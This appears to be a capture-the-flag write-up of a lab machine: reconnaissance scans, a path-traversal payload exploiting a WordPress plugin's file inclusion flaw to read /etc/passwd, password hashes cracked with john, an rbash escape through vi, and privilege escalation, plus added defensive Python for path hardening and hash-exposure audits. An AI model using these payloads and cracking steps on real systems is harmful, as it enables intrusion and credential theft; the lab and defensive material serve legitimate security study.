Preface

This machine has a problem under VMware (it cannot get an IP address assigned properly), so I did it in VirtualBox.

Attacker IP: 192.168.1.29

Information Gathering

Run nmap to scan for the target host; the target's IP turns out to be 192.168.1.28.

kali@kali:~$ nmap -sP 192.168.1.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-09 21:21 EDT
Nmap scan report for 192.168.1.1
Host is up (0.013s latency).
Nmap scan report for 192.168.1.4
Host is up (0.041s latency).
Nmap scan report for 192.168.1.16
Host is up (0.0010s latency).
Nmap scan report for 192.168.1.28
Host is up (0.0030s latency).
Nmap scan report for 192.168.1.29
Host is up (0.00043s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.44 seconds

Continue by scanning the services on the target host:

kali@kali:~$ nmap -p1-65535 -A 192.168.1.28
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-09 21:26 EDT
Nmap scan report for 192.168.1.28
Host is up (0.00015s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:36:4e:71:6a:83:e2:c1:1e:a9:52:64:45:f6:29:80 (RSA)
| 256 b4:ce:5a:c3:3f:40:52:a6:ef:dc:d8:29:f3:2c:b5:d1 (ECDSA)
|_ 256 09:6c:17:a1:a3:b4:c7:78:b9:ad:ec:de:8f:64:b1:7b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.68 seconds

An HTTP service and an SSH service were found.

Vulnerability Discovery

Visiting the target web site shows the Apache server's default information page.

Next, scan the site's directories with dirb:

kali@kali:~$ dirb http://192.168.1.28

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Jul 9 23:43:56 2020
URL_BASE: http://192.168.1.28/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.28/ ----
+ http://192.168.1.28/index.html (CODE:200|SIZE:10918)
+ http://192.168.1.28/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://192.168.1.28/tsweb/

---- Entering directory: http://192.168.1.28/tsweb/ ----
+ http://192.168.1.28/tsweb/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-content/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-includes/
+ http://192.168.1.28/tsweb/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.1.28/tsweb/wp-admin/ ----
+ http://192.168.1.28/tsweb/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/css/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/images/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/includes/
+ http://192.168.1.28/tsweb/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/js/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/maint/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/network/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-admin/user/

---- Entering directory: http://192.168.1.28/tsweb/wp-content/ ----
+ http://192.168.1.28/tsweb/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.28/tsweb/wp-content/plugins/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-content/themes/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-content/upgrade/
==> DIRECTORY: http://192.168.1.28/tsweb/wp-content/uploads/

---- Entering directory: http://192.168.1.28/tsweb/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.28/tsweb/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.28/tsweb/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.28/tsweb/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.28/tsweb/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.28/tsweb/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.28/tsweb/wp-admin/network/ ----
+ http://192.168.1.28/tsweb/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.28/tsweb/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.1.28/tsweb/wp-admin/user/ ----
+ http://192.168.1.28/tsweb/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.28/tsweb/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.1.28/tsweb/wp-content/plugins/ ----
+ http://192.168.1.28/tsweb/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.1.28/tsweb/wp-content/themes/ ----
+ http://192.168.1.28/tsweb/wp-content/themes/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.1.28/tsweb/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.28/tsweb/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Thu Jul 9 23:44:08 2020
DOWNLOADED: 36896 - FOUND: 13

From the scan results above, the site root is http://192.168.1.28/tsweb, and it is a WordPress site.

Since it is a WordPress site, scan it with wpscan:

A plugin, gracemedia-media-player, was found; searching the CVE site turned up CVE-2019-9618.

This is a file inclusion vulnerability: looking at the source shows that the user input is handed to require_once without any checking at all, which leads to arbitrary file inclusion.

The exploitation method is:

/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
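As an added illustration (not the plugin's code and not part of the original writeup, and in Python rather than the plugin's PHP), the following shows the unchecked path resolution the paragraph above describes next to a hardened version that allowlists the template name and then verifies the final path still lies inside the base directory, plus a small detector for traversal indicators in request parameters that is useful when reviewing web logs. The base directory and the allowlist names are assumptions; the payload value is the one from the request above.

```python
import os
import re
from urllib.parse import unquote

# Constructed stand-in for the plugin's templates/files directory (assumption, not the real layout).
BASE_DIR = "/var/www/html/tsweb/wp-content/plugins/gracemedia-media-player/templates/files"
# Hypothetical allowlist of template names the handler is permitted to include.
ALLOWED_CFG = {"default", "playlist"}
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+$")
# Traversal indicators as they appear after URL decoding: a '..' path step.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# The cfg value from the request shown above.
PAYLOAD = "../../../../../../../../../../etc/passwd"


def resolve_unchecked(base_dir, cfg):
    """The flawed pattern: the request parameter goes straight into the include path,
    so a run of '../' walks out of base_dir to any file the web server can read."""
    return os.path.normpath(os.path.join(base_dir, cfg))


def resolve_checked(base_dir, cfg):
    """Hardened resolution: the value must be a bare, allowlisted name, and the final
    path must still lie inside base_dir (a second check in case the allowlist is loosened)."""
    if not SAFE_NAME.match(cfg) or cfg not in ALLOWED_CFG:
        raise ValueError(f"rejected cfg value: {cfg!r}")
    root = os.path.normpath(base_dir)
    candidate = os.path.normpath(os.path.join(root, cfg + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("resolved path escapes the base directory")
    return candidate


def classify(base_dir, cfg):
    """'allowed' or 'blocked' for a cfg value; handy for tests and for replaying log entries."""
    try:
        resolve_checked(base_dir, cfg)
        return "allowed"
    except ValueError:
        return "blocked"


def traversal_indicator(raw_value):
    """True when a request parameter contains '..' path steps, after stripping one or two
    layers of URL encoding so %2e%2e and %252e%252e are caught as well."""
    decoded = unquote(unquote(raw_value))
    return bool(TRAVERSAL.search(decoded))


if __name__ == "__main__":
    print("unchecked ->", resolve_unchecked(BASE_DIR, PAYLOAD))
    print("checked   ->", classify(BASE_DIR, PAYLOAD))
    print("traversal ->", traversal_indicator(PAYLOAD))
```

The allowlist is the real fix; the commonpath check only guards against a later change that relaxes it, and the indicator function is for detection, not enforcement, since encoded and doubly encoded variants are easy to miss in a plain string match.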

The flag user's password is stored as a hash directly in /etc/passwd, so send it to john to crack:

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash

john quickly recovers the flag user's password: topsecret

rbash Bypass

From the /etc/passwd file earlier we know the current user's shell is /bin/rbash, in which many commands are forbidden, so rbash has to be bypassed. The rbash bypass method was covered in the DC-2 machine.

Because the vi command is available, vi can be used for the bypass. First set the shell inside the vi editor:

set shell=/bin/bash

Then invoke that shell and press Enter:

The current shell is now bash:

But the current user's privileges are still insufficient, so the next step is privilege escalation.

Privilege Escalation

First, run sudo -l to see which commands the current user may run with sudo:

flag@hacknos:/$ sudo -l
[sudo] password for flag:
Sorry, user flag may not run sudo on hacknos.

The flag user has no sudo rights. Next, look for files with the SUID bit set:

flag@hacknos:/$ find / -perm -u=s 2>/dev/null
/snap/core/9436/bin/mount
/snap/core/9436/bin/ping
/snap/core/9436/bin/ping6
/snap/core/9436/bin/su
/snap/core/9436/bin/umount
/snap/core/9436/usr/bin/chfn
/snap/core/9436/usr/bin/chsh
/snap/core/9436/usr/bin/gpasswd
/snap/core/9436/usr/bin/newgrp
/snap/core/9436/usr/bin/passwd
/snap/core/9436/usr/bin/sudo
/snap/core/9436/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9436/usr/lib/openssh/ssh-keysign
/snap/core/9436/usr/lib/snapd/snap-confine
/snap/core/9436/usr/sbin/pppd
/snap/core/8039/bin/mount
/snap/core/8039/bin/ping
/snap/core/8039/bin/ping6
/snap/core/8039/bin/su
/snap/core/8039/bin/umount
/snap/core/8039/usr/bin/chfn
/snap/core/8039/usr/bin/chsh
/snap/core/8039/usr/bin/gpasswd
/snap/core/8039/usr/bin/newgrp
/snap/core/8039/usr/bin/passwd
/snap/core/8039/usr/bin/sudo
/snap/core/8039/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8039/usr/lib/openssh/ssh-keysign
/snap/core/8039/usr/lib/snapd/snap-confine
/snap/core/8039/usr/sbin/pppd
/bin/su
/bin/mount
/bin/fusermount
/bin/ping
/bin/umount
/usr/bin/traceroute6.iputils
/usr/bin/at
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newuidmap
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1

There is /usr/bin/at in the list; I searched and a vulnerability does exist for it, but the version doesn't match, so SUID privilege escalation doesn't work either.

Next, check the current kernel version:

flag@hacknos:/$ uname -a
Linux hacknos 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 4.15.0: a possibly usable exploit turned up on exploit-db, https://www.exploit-db.com/exploits/47163 , but it can't be compiled because there is no gcc:

I then considered compiling it on another Ubuntu 16.04 machine and downloading it onto the target host, but that didn't work either:

After the three most common privilege escalation techniques all failed, I was stuck. I then looked at someone else's writeup, which said there is a backup file under the /var directory:

A file containing an md5crypt ($1$) hash was found:

$1$rohit$01Dl0NQKtgfeL08fGrggi0

Sent to john, it yields the password !%hack41

Earlier we saw from /etc/passwd that there is another user, rohit; this might be that user's password. Trying to switch user succeeds.
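The two findings above, the hash sitting in the flag user's /etc/passwd entry and the hash left in a world-readable backup under /var, are the same class of exposure. The following added Python audit (not from the original writeup) flags /etc/passwd entries whose password field holds a real hash instead of x, notes restricted shells, and walks a directory for world-readable files containing crypt-style hashes. The sample lines are the /etc/passwd entries shown earlier plus a constructed root entry; the backup file name and contents in self_check are constructed placeholders.

```python
import os
import re
import stat
import tempfile

# crypt(3)-style hashes: $1$ (md5crypt), $2*$ (bcrypt), $5$/$6$ (sha-crypt), $y$ (yescrypt).
CRYPT_HASH = re.compile(r"\$(?:1|2[aby]?|5|6|y)\$[^\s:]+")
# Values that legitimately appear in the /etc/passwd password field (the hash lives in /etc/shadow).
SHADOWED_MARKERS = {"x", "*", "!", "!!"}

# The /etc/passwd lines recovered earlier, plus a normal root entry (constructed sample).
SAMPLE_PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash",
    "flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash",
]


def passwd_findings(lines):
    """Return (user, issue) pairs for /etc/passwd-style lines.
    /etc/passwd is world-readable, so a real hash in the password field is exposed to
    every local user; an empty field means no password is required at all."""
    findings = []
    for line in lines:
        fields = line.rstrip("\n").split(":")
        if len(fields) != 7:
            continue  # malformed line; a separate integrity problem, skipped here
        user, pw_field, _uid, _gid, _gecos, _home, shell = fields
        if pw_field == "":
            findings.append((user, "empty password field"))
        elif pw_field not in SHADOWED_MARKERS:
            findings.append((user, "hash stored in /etc/passwd"))
        if os.path.basename(shell) == "rbash":
            findings.append((user, "restricted shell"))
    return findings


def hashes_in_text(text):
    """All crypt-style hashes found in a text blob."""
    return CRYPT_HASH.findall(text)


def scan_directory(root):
    """Walk root and return (path, hash) for every world-readable regular file that
    contains a crypt-style hash; unreadable or non-text files are skipped."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                mode = os.stat(path).st_mode
                if not stat.S_ISREG(mode) or not mode & stat.S_IROTH:
                    continue
                with open(path, "r", encoding="utf-8", errors="strict") as fh:
                    text = fh.read()
            except (OSError, UnicodeDecodeError):
                continue
            hits.extend((path, h) for h in hashes_in_text(text))
    return hits


def self_check():
    """Build a throwaway directory holding a constructed world-readable backup and a
    constructed owner-only file, scan it, and return the hashes that were exposed."""
    with tempfile.TemporaryDirectory() as tmp:
        backup = os.path.join(tmp, "backup.txt")  # hypothetical backup file name
        with open(backup, "w", encoding="utf-8") as fh:
            fh.write("rohit:$1$rohit$01Dl0NQKtgfeL08fGrggi0\n")
        os.chmod(backup, 0o644)  # world-readable, like the backup found under /var
        private = os.path.join(tmp, "private.txt")
        with open(private, "w", encoding="utf-8") as fh:
            fh.write("$6$salt$constructedhashnotreadablebyothers\n")
        os.chmod(private, 0o600)  # owner-only: must not be reported
        return [h for _path, h in scan_directory(tmp)]


if __name__ == "__main__":
    for user, issue in passwd_findings(SAMPLE_PASSWD):
        print(f"{user}: {issue}")
    print("exposed hashes:", self_check())
```

Run against a real system you would feed passwd_findings the lines of /etc/passwd and point scan_directory at /var (or at any backup location); anything it reports is a hash that every local account can copy off for offline cracking, which is exactly the path this machine follows twice.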

Running sudo -l shows this user can run any command with sudo:

So simply look in the /root directory and read the flag there:

Summary

The point of this machine is probably that you should pay more attention to the /var directory; there may be unexpected finds in it.